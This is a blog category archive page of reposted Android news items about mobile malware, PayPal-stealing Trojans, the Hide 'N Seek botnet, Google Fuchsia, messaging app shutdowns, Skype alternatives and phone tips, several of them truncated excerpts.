Category Archives: Android

All the reasons why cybercriminals want to hack your phone

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in US cellular exchange, the vulnerability known as SS7, which allows hackers to listen to calls, read texts, and see users’ locations after learning their phone numbers. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some personal information from a victim that available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works but it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone not backed up elsewhere, they could easily feel pressured to cave into hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of the cryptomining malware called Loapi is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill by successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety is might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions. of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.

Mobile Menace Monday: Is Fuchsia OS the end of Android?

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with user interface, and it has the ability to scale up to larger devices like laptops and computers. Also, it can support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, it calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.

Zircon

It all starts with Zircon(formerly Magenta), the Fuchsia Operating System’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon operates as a foundation on which the Fuchsia house foundation is built, and it primarily handles access to hardware and communication between software.

Garnet

The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed for the OS, such as its network and graphics, together with the package manager and device drivers. Some of them worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for Volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor,  modern editor with a backend written in Rust.

Peridot

The next layer up, Peridot, mostly handles Fuchsia’s modular runtime app design for composition. What this means is almost everything that exists in Fuchsia, such as software and even system files, are in packages. And Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia, and it provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.

Topaz

Topaz is the top layer and the one you’ll mostly likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development abilities for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Due to the Flutter software development kit offering cross-platform opportunities, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at https://flutter.io.

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zirkon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar with the code name Singularity, but they totally failed. That’s why there’s a big question mark if Fuchsia will actually replace Android and Chrome OS, or putter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.

A week in security (December 10 – 16)

Last week on Labs, we took a look at some new Mac malware, a collection of various scraped data dumps, the protection of power grids, and how bad actors are using SMB vulnerabilities. 

Other cybersecurity news

  • Millions affected by Facebook photo API bug: An issue granted third-party apps more access to photos than should normally be granted, including images uploaded but not published. (source: Facebook)
  • Bomb threats may be a hoax: An email in circulation urging ransom payments in Bitcoin lest bombs across the US be detonated may well be a fake, according to US law enforcement. (source: The Register)
  • Man jailed for fraud offenses: A man in the UK has been jailed for taking part in fraudulent activities. The main point of interest is surely the spectacular device he built. (source: Met Police)
  • Another Google Plus bug: For six days, developer were able to access profile data not made public by the users. (source: Google)
  • Windows 10 data collection: Reddit users complained Windows 10 is grabbing a certain kind of data even with the setting disabled. (source: How to Geek)
  • Taylor Swift concert tracks stalkers with facial recognition software: At a recent event, cutting-edge tech was deployed to ensure the crowds were free of potential troublemakers. (Source: Rolling Stone)
  • Password disasters of 2018: A tongue in cheek look at some of the more spectacular password mishaps seen rumbling into view this year. (Source: Help Net Security)
  • Android Trojan steals from PayPal accounts: Even with 2FA enabled, it might not be enough to keep your account balance safe. (Source: ESET)
  • Character recognition collects URLs in YouTube videos: Theoretically private data in hidden videos may not be as private as you’d first hoped. (Source: Austin Burk’s blog)
  • Traveller data left lying around on USB sticks: Border Agents aren’t being quite as careful as they should be where potentially sensitive passenger data is concerned. (Source: Naked Security)

Stay safe, everyone!

The post A week in security (December 10 – 16) appeared first on Malwarebytes Labs.

Call of Duty mobile Android beta launched~ Download Here

Call of Duty mobile Android beta version now available for download

In August this year, Activision, an American video game publisher, had partnered with Tencent Games, the mobile publisher of the popular multiplayer online battle royale game, PlayerUnknown’s Battlegrounds (PUBG), for a new Call of Duty mobile game for China!

After its initial success in China, Activision has now soft-launched Call of Duty: Legends of War, the newest first-person shooter game for mobile on Android for select regions, in collaboration with Tencent Games.

Apparently, Call of Duty: Legends of War, is already available for download for users in Australia from the Google Play Store in a closed alpha.

According to the description, the new game “combines the best maps, characters, weapons and gear from the Call of Duty universe and brings them together for the first time.”

The game features multiplayer (with 4 game modes like Free4All, Search & Destroy, Team Deathmatch and Frontline) along with a zombie mode where you can fight against real players or bots.

Further, it includes classic maps such as Nuketown, Killhouse, Hijacked, Crossfire, Standoff, and Crash. Players can choose to don characters from the Call of Duty Universe like Price, Ghost, and others to participate in the game.

Just like in PUBG, players can customize characters and weapons by using the in-game currency which can be earned by playing through the game or by real-world currency.

The new game has a new Facebook page that showcases a trailer for Call of Duty: Legends of War, which combines an MP and Zombies experience.

How To Download Call Of Duty Mobile Beta Version-

Those who are interested in downloading Call of Duty: Legends of War before it is officially released around the globe can follow the steps below:

  1. Download Call of Duty: Legends of War 1.0.0 beta APK file.
  2. Install the APK file in your Android phone.
  3. Launch the game and exit it after the initial loading screen comes up.
  4. Download the additional OBB file on your phone (1.06 GB in size; it is advisable to use Wi-Fi or LAN to download this over 1GB file).
  5. Extract the OBB file to the location: /Android/obb/com.activision.callofduty.shooter and ensure that the OBB file is saved within com.activision.callofduty.shooter folder.
  6. That’s it! You are ready to enjoy the game.

However, please note that since the game is currently in alpha stage, the chances of bugs affecting your gameplay often is very high.

The post Call of Duty mobile Android beta launched~ Download Here appeared first on TechWorm.

Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials

Avast security analysts reported that the Hide ‘N Seek botnet continues to grow by infecting vulnerable Internet of Things (IoT) devices still using their default passwords.

According to Avast, the Hide ‘N Seek botnet comes with two main functionalities. The first capability involves the use of a scanner borrowed from Mirai malware to reach random IP addresses of IoT devices and abuse well-known exploits. If this doesn’t work, the scanner attempts to brute-force access to an IoT device using a hard-coded list of default passwords.

For its second functionality, the IoT botnet uses a peer-to-peer (P2P) protocol to share information about new peers, exfiltrate files from an infected device and distribute new binaries, including some for a Monero cryptocurrency miner. Avast’s researchers believe the Monero miner was just a test and that the attackers’ true intentions are still unknown.

A Busy Year for Hide ‘N Seek

Bitdefender researchers were the first to spot the Hide ‘N Seek botnet in January 2018. A few months later, Bitdefender reported the threat had added code that abused two new vulnerabilities affecting Internet Protocol television (IPTV) camera models to scan for a larger pool of vulnerable devices and to achieve persistence on an infected IoT product.

More improvements followed in July, when 360 Netlab observed additional exploits and a then-inactive mining program. Two months later, Bitdefender discovered yet another update when Hide ‘N Seek gained the ability to exploit the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices.

The botnet’s evolution is of particular concern given the overall growth in IoT threats. In just the first half of 2018, Kaspersky Lab detected 121,588 IoT malware samples — three times as many samples uncovered for all of 2017.

How to Defend Your Organization Against IoT Botnets

Security professionals can help defend against IoT botnets by changing all default passwords on their organization’s devices. Toward this end, security teams should also build an incident response team that can oversee software patches and disclose any breaches.

Sources: Avast, Bitdefender, Bitdefender (1), 360 Netlab, Bitdefender(2), Kaspersky Lab

The post Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials appeared first on Security Intelligence.

3 New Ways To Take A ScreenShot On Android Smartphones

Android is possibly the most popular Smartphone OS with more than 2 billion monthly active devices.

There might be times when you are looking for how to take screenshots on Android smartphone?

Here in this article, we are providing you with the best easiest ways to take a screenshot on android devices.

A screenshot is an image taken of whatever’s on your screen. The process of taking screenshots on Android smartphones might sound obvious to many users but still, it’s good to learn some new stuff.

So these are the three best ways to capture and share a screenshot on Android smartphones.

ALSO READ: 5 New Ways To Take A Screenshot On Windows 10


Here is how to take a screenshot on Android smartphone?

The Standard Way To Take Screenshot On Android

The most basic way to capture a screenshot on Android smartphones is by pressing the volume down and power button at the same time. This will instantly capture a screenshot of whatever’s on your screen.

A screenshot captured by using the above-mentioned process is generally verified by a screenshot capture sound, screen flash, or a notification.


Screenshot Using Gestures

The next best way to capture screenshots on Android is by using third-party applications. These Screenshot applications eliminate the need of pressing physical buttons to capture a screenshot.

Furthermore, using screenshot capturing applications you can even use gestures to capture screenshots. Third-party screenshot capturing applications also offer photo editing tools.

You can find an extensive collection of applications to capture screenshots on Playstore.


Scrolling Screenshots In Android

A typical screenshot only captures what’s on your screen but if you want to share a web-page or a long chat conversation then scrolling or long screenshot might help you.

Many Android OEMs like OnePlus have introduced scrolling screenshots. That said, if your smartphone’s custom skin doesn’t support this feature you can download an application called LongShot to capture scrolling screenshots.

Longshot has a very well-developed and easy to navigate UI. Furthermore, capturing scrolling screenshots using Longshot is pretty much self-explanatory.

DOWNLOAD LongShot


So these were three basic ways to capture and easily share screenshots on Android smartphones.

The post 3 New Ways To Take A ScreenShot On Android Smartphones appeared first on TechWorm.

Android Malware Steals from PayPal Accounts

What happens when you combine a remotely controlled banking Trojan with an abuse of Android Accessibility services? According to new research from ESET, you get an Android Trojan that steals money from

The post Android Malware Steals from PayPal Accounts appeared first on The Cyber Security Place.

10 Best Free Skype Alternatives For Windows/Android/iOS

Since its advent in 2003, Skype has become an industry standard when it comes to video calling on Windows PC. In addition to video calls, Skype is also a full-fledged messaging and voice calling application that is available for smartphones as well.

Even after its immense popularity, Skype is still not the most feature-rich and secure video calling application.

So these are some of the best alternatives to Skype that will definitely enhance your video calling experience.

ALSO READ: 10 Best Anime websites of 2018 | Download and Watch Anime Online for Free

Best Free Skype Alternatives


WhatsApp

The first Skype alternative for PC that you are probably already using is WhatsApp. This immensely popular messaging application also doubles up as a reliable video-calling application. WhatsApp is available for both smartphones and computers.

A majority of your friends and family members are already using WhatsApp, which eliminates the need for signing up for new services.

WhatsApp now supports group video calls, using which you can communicate with up to four friends at once. Overall WhatsApp is a reliable Skype alternative.

DOWNLOAD WhatsApp


Google Hangouts

Google Hangouts is another popular video calling service that is mainly used by various organizations to interact with co-workers. Similar to WhatsApp Google Hangouts is also available for smartphones and computers.

Using Google Hangouts you can hold a video call with up to 25 participants. So as to invite and connect with different users you only need their email address or phone number.

During calls, Google Hangouts offers impressive audio and video quality and the connection is secure as well.

DOWNLOAD Google Hangouts


LINE

The next feature-rich Skype alternative is LINE. This alternative to Skype has a very well developed UI and cross-platform support offers a seamless messaging experience.

Similar to other Skype alternatives on the list, LINE can also be used for video calls, voice calls, and text messaging. Nifty features like Keep, Animated Stickers, LINE Today, Face Play, Stories, and Live help LINE to stand out from the crowd.

Lastly, using LINE you can also share all sort of media and document files with your contacts.

DOWNLOAD LINE


Facebook Messenger

The next best Skype alternative that you are possibly already using is Facebook Messenger. Using Messenger you can communicate with any of your Facebook friends and the quality of video calls is impressive as well.

In addition to video calls, Messenger also allows users to have voice calls with their friends. Messenger is available as a full-fledged application for Windows, iOS, Android, and MacOS.

DOWNLOAD Facebook Messenger


Tox

Tox is one of the most secure Skype alternative that has gained popularity in recent years. Well, if security and privacy is your major concern then Tox is the best Skype alternative for you. Since Tox is open-source it is completely advertisement free.

Similar to other Skype alternatives, Tox also offers messaging, file sharing, and voice calling features.

Using the Screen Sharing feature you can even share your desktop with your friends. Lastly, Tox is available for both Windows and MacOS.

DOWNLOAD TOX


WeChat

The next smartphone oriented Skype alternative is WeChat. Similar to other Skype alternatives WeChat offers voice calls, text messaging, video calls and group chats.

As mentioned earlier, WeChat is a smartphone-oriented application but its still available for Windows and MacOS in their respective App Store. It is worth noting that, a smartphone is required for logging-in to WeChat Web version.

WeChat allows a maximum of four participants in a group video call. To sum it all, WeChat is a reliable Skype alternative that simply gets the job done.

DOWNLOAD WeChat


ooVoo

The next capable Skype alternative on the list is ooVoo. This instant messaging application offers a great messaging experience and supports emoji, stickers, and GIFs. ooVoo supports HD video calling with up to 8 people simultaneously.

The SuperClear technology helps ooVoo to optimize the quality of video calls based on your internet speed. ooVoo is available for Android, iOS, Windows, and MacOS.

This feature-rich Skype alternative also doubles up as a reliable file transfer tool.

DOWNLOAD ooVoo


Viber

Viber is another impressive Skype alternative for secure video calls and messaging. Unlike other Skype alternatives, Viber allows users to play built-in games and interact with popular websites when no one is present at the moment.

If you worried about privacy and security then end-to-end encryption on Viber will definitely impress you. Viber even allows users to delete seen messages. In addition to Windows, Viber is also available for MacOS and Linux.

Viber is one among very few instant messaging applications that allow users to customize application’s theme and overall UI based on their preferences.

DOWNLOAD Viber


Wire

If security and privacy are on top of your priority list then Wire will definitely impress you. Wire is an ideal Skype alternative for business or organization based communication needs. This application offers end-to-end encrypted audio conference call with up to 10 people.

In addition to messaging and video calls, Wire also doubles up as a secure file and screen sharing tool. Since Wire is an open-source application its completely ad-free and there are no in-app purchases.

Overall, Wire is a professional alternative to Skype that is used by many big companies.

DOWNLOAD Wire


Riot

The last Skype alternative on the list is Riot. Nifty features like voice and video conferencing, file sharing, notifications, and project reminders definitely help Riot to stand out from the crowd.

Riot can be used on any web-browser and its available for smartphones and computers as well. Chats and calls on Riot are also end-to-end encrypted.

Overall Riot is a reliable Skype alternative that simply gets the job done.

DOWNLOAD Riot


CONCLUSION

So these were some of the best Skype alternatives that are more secure and feature-rich as compared to Skype. Do share your favorite Skype alternatives in the comments section below.

The post 10 Best Free Skype Alternatives For Windows/Android/iOS appeared first on TechWorm.

In a Test, 3D Model of a Head Was Able To Fool Facial Recognition System of Several Popular Android Smartphones

Forbes magazine tested four of the most popular handsets running Google's operating systems and Apple's iPhone to see how easy it'd be to break into them with a 3D-printed head. All of the Android handsets opened with the fake. Apple's phone, however, was impenetrable. From the report: For our tests, we used my own real-life head to register for facial recognition across five phones. An iPhone X and four Android devices: an LG G7 Linq, a Samsung S9, a Samsung Note 8 and a OnePlus 6. I then held up my fake head to the devices to see if the device would unlock. For all four Android phones, the spoof face was able to open the phone, though with differing degrees of ease. The iPhone X was the only one to never be fooled. There were some disparities between the Android devices' security against the hack. For instance, when first turning on a brand new G7 Linq, LG actually warns the user against turning facial recognition on at all. No surprise then that, on initial testing, the 3D-printed head opened it straightaway. [...] The OnePlus 6 came with neither the warnings of the other Android phones nor the choice of slower but more secure recognition.

Read more of this story at Slashdot.

Nasty Android malware found stealing its victims’ PayPal funds

By Waqas

Another day, another Android malware – This time, according to the latest findings of ESET’s IT security researchers, there is a new malware in Google Play Store that hijacks PayPal account to steal money – Researchers assessed that the malware is specifically targeting Android users and steals no less than $1,000. The malware was first […]

This is a post from HackRead.com Read the original post: Nasty Android malware found stealing its victims’ PayPal funds

Android Trojan steals money from victims’ PayPal account

ESET researchers have unearthed a new Android Trojan that tricks users into logging into PayPal, then takes over and mimics the user’s clicks to send money to the attacker’s PayPal address. The heist won’t go unnoticed by the victim if they are looking at the phone screen, but they will also be unable to do anything to stop the transaction from being executed as it all happens in a matter of seconds. The only thing … More

The post Android Trojan steals money from victims’ PayPal account appeared first on Help Net Security.

November 2018: Most wanted malware exposed

Check Point has published its latest Global Threat Index for November 2018. The index reveals that the Emotet botnet has entered the Index’s top 10 ranking after researchers saw it spread through several campaigns, including a Thanksgiving-themed campaign. This involved sending malspam emails in the guise of Thanksgiving cards, containing email subjects such as happy “Thanksgiving day wishes”, “Thanksgiving wishes” and “the Thanksgiving day congratulation!” These emails contained malicious attachments, often with file names related … More

The post November 2018: Most wanted malware exposed appeared first on Help Net Security.

Google’s CEO Thinks Android Users Know How Much Their Phones Are Tracking Them

An anonymous reader quotes a report from TechCrunch: Google CEO Sundar Pichai thinks Android users have a good understanding of the volume of data Google collects on them, when they agree to use the Android mobile operating system. The exec, who is testifying today in front of the House Judiciary committee for a hearing entitled "Transparency & Accountability: Examining Google and its Data Collection, Use and Filtering Practices," claimed that users are in control of the information Google has on them. "For Google services, you have a choice of what information is collected, and we make it transparent," Pichai said in response to questioning from Chairman of the House Judiciary Committee Rep. Bob Goodlatte (R-VA). Google's defense on the data collection front is similar to Facebook's -- that is, Pichai responded that Google provides tools that put users in control. But do they actually use them? "It's really important for us that average users are able to understand it," said Pichai, stating that users do understand the user agreement for Android OS. "We actually ... remind users to do a privacy checkup, and we make it very obvious every month. In fact, in the last 28 days, 160 million users went to their My Account settings, where they can clearly see what information we have -- we actually show it back to them. We give clear toggles, by category, where they can decide whether that information is collected, stored, or -- more importantly -- if they decide to stop using it, we work hard to make it possible for users to take their data with them," he said. When asked if Google could improve its user dashboard and tools to better teach people how to protect their privacy, including turning off data collection and location tracking, Pichai said "there's complexity," but it is "something I do think we can do better." He continued: "We want to simplify it, and make it easier for average users to navigate these settings. It's something we are working on."

Read more of this story at Slashdot.

Apps on smartphones are selling and sharing our location data 24/7

By Waqas

It’s no surprise that the apps we download on our smartphones are tracking our movements and also transferring the information to third parties without our consent. Last year it was Google caught collecting location data of Android users even if their device’s location service was off then the Gay dating app Grindr, Facebook and the fitness app by […]

This is a post from HackRead.com Read the original post: Apps on smartphones are selling and sharing our location data 24/7

5G and cybersecurity

Keeping you safe in an increasingly connected world

If you’ve upgraded your smartphone in the last few years, there’s a very good chance your handset supports 4G mobile networks. 4G, short for ‘fourth generation’, offers super-fast data download speeds allowing you to stream more video, share larger high-resolution pictures and to browse the web more quickly.

But even these speeds are not enough to keep pace with demand. Everything is getting bigger – 4K video file sizes are enormous, and augmented reality animations are bandwidth hungry.

There is a second issue that needs to be addressed too – the sheer number of wireless devices connecting to mobile networks. Smart devices are an increasingly important part of modern life, at home and in the workplace.

We need more bandwidth and faster connectivity to deal with the changing demands on mobile networks. We are already outgrowing the possibilities of 4G networking.

Welcome to 5G networking

The good news is that the fifth generation (5G) of mobile network technologies has been designed and is undergoing testing. Mobile operators across the world are in the advanced stages of planning how these systems will be rolled out to consumers and businesses in the UK and beyond.

The introduction of 5G technologies will allow us to do more than ever before with our devices – but it also highlights a serious challenge. More and more devices are being connected to mobile networks, and each represents a potential security risk.

Smart sensors used in factories allow manufacturers to monitor assembly lines in real time for instance. But if poorly configured, or insufficiently secured, these devices could be used to hack into the company network to steal other data.

Other devices, like self-driving cars are completely reliant on mobile network connections to work properly. These vehicles are permanently connected, uploading and downloading data to the cloud to make split second decisions. If these decisions are interrupted – by hackers breaking through the network security for instance – the car could be involved in an accident, perhaps even killing people in the process.

More security required

With more devices connected to mobile networks, the need for security increases. Every single device needs to be protected against cyberattack, which means that security systems need to be present everywhere.

To cope with the increasing number of devices, security systems will also have to get smarter. Artificial intelligence will become more important, monitoring network activity to identify – and block – suspicious behaviour automatically. This approach is quicker, and more effective, than traditional IT security provisions especially as security software does not necessarily have to be installed directly on each device.

Play your part

Businesses will have to take care of their own smart sensors, but consumers need to get involved. The increased number of devices and network traffic presents a risk to you too – so you must ensure your smartphone is properly protected.

Even if you don’t have a 5G connection, you can take steps to protect yourself now. Download and install a free copy of Panda Security Antivirus for Android today and you’ll be fully prepared to overcome the future challenges of next generation mobile networks.

The post 5G and cybersecurity appeared first on Panda Security Mediacenter.

22 malware infected apps on Play Store found draining phone’s battery

By Waqas

Another day, another malware targeting Android users – This time, 22 apps have been removed from the Play Store after security researchers found malware draining user phone’s battery and also downloading files without their consent. These Android apps disguised themselves as legitimate software and in some cases even offered some functionality. The most popular of […]

This is a post from HackRead.com Read the original post: 22 malware infected apps on Play Store found draining phone’s battery

Google Play Services Drops Support For Android Ice Cream Sandwich

Google is pulling support for Android 4.0 Ice Cream Sandwich more than seven years after it was first introduced. The company announced in a blog post that Google Play services will no longer provide updates for the APIs (14 and 15) used by applications running on ICS. VentureBeat reports: Ice Cream Sandwich (ICS), as Android 4.0 to 4.0.4 is more affectionately known, was a landmark operating system in many ways, ushering in a whole new set of interface guidelines -- with a more minimalist design, not to mention groundbreaking features such as near-field communication (NFC), lockscreen support for camera and music controls, and facial recognition smarts for unlocking devices. App developers who currently offer minimum support of API level 16 (Android 4.1 Jelly Bean) and over won't have to do anything as a result of these changes. However, if their apps currently support API level 14 or 15, they will encounter a build error when updating to a newer SDK version. Google is now recommending that all developers target API level 16 as the bare minimum, which means those still using Ice Cream Sandwich on their Android device won't even see the app update in Google Play, let alone be able to download it.

Read more of this story at Slashdot.

Klickbetrug mit Gewinnoptimierung: Android-Apps tarnen sich als iPhone-Programme

Profitsteigerung ist eine der Maximen jedes Cyberkriminellen. Da wundert es nicht, dass die SophosLabs nun eine neue Machenschaft aufgedeckt haben, die auf der Tatsache beruht, dass Werbetreibende mehr Geld pro Klick zahlen, wenn dieser von vermeintlich wohlhabenderen iPhone- oder iPad-Besitzern kommt. Da der sogenannte Klickbetrug, bei dem kommerzielle Werbeflächen geklickt oder Klicks zur Manipulation der […]

Google Is Shutting Down Its Allo Messaging App, Says Report

According to 9to5Google, citing a source familiar with the plan, Google will "soon" announce that it will be shutting down its Google Allo messaging app. "This development comes almost 8 months after Anil Sabharwal, Vice President of Chrome, Comms and Photos at Google, said that the company was 'pausing investment' in Google Allo," reports 9to5Google. It also comes less than a week after 9to5Google reported that Google will be shutting down Google Hangouts for consumers sometime in 2020. Google may delay the news about Allo due to the backlash stemming from the article about Hangouts. From the report: Lately, some of the app's remaining users have complained of bugs and broken functionality: there have been messages not being delivered, features like hearting posts randomly disappearing for some, and the latest stable version has been unable to perform Google Drive restores of chats for several weeks. Meanwhile, essentially the entire Allo team was moved to work on Android Messages and spent the last several months porting over much of Allo's features and functionality -- all leading up to the recent beginnings of evidence that the rollout of Google's RCS 'Chat' initiative is gaining traction.

Read more of this story at Slashdot.

Google Hangouts For Consumers Will Be Shutting Down Sometime In 2020

According to 9to5Google, Google Hangouts for consumers will be shutting down sometime in 2020. The news shouldn't come as too much of a surprise since Google essentially stopped development on the app more than a year ago. Thankfully, there are plenty of other Google messaging apps available, such as Allo, Duo, and Android Messages. From the report: Last spring, Google announced its pivot for the Hangouts brand to enterprise use cases with Hangouts Chat and Hangouts Meet, so the writing has been on the wall for quite some time regarding the Hangouts consumer app's demise. Meanwhile, Google has transitioned its consumer-facing messaging efforts to RCS 'Chat' and Android Messages following Allo's misadventures. As mentioned, Hangouts as a brand will live on with G Suite's Hangouts Chat and Hangouts Meet, the former intended to be a team communication app comparable to Slack, and the latter a video meetings platform. Meanwhile, Google Voice calling, which was at first independent and then long integrated into Hangouts, was moved back out to its own redesigned app earlier this year. Interestingly, despite its forthcoming axing, Hangouts was one of a few apps to get early support for Android Auto's new MMS and RCS functionality, alongside Android Messages and WhatsApp.

Read more of this story at Slashdot.

How To Stop Ads On Android Home Screen

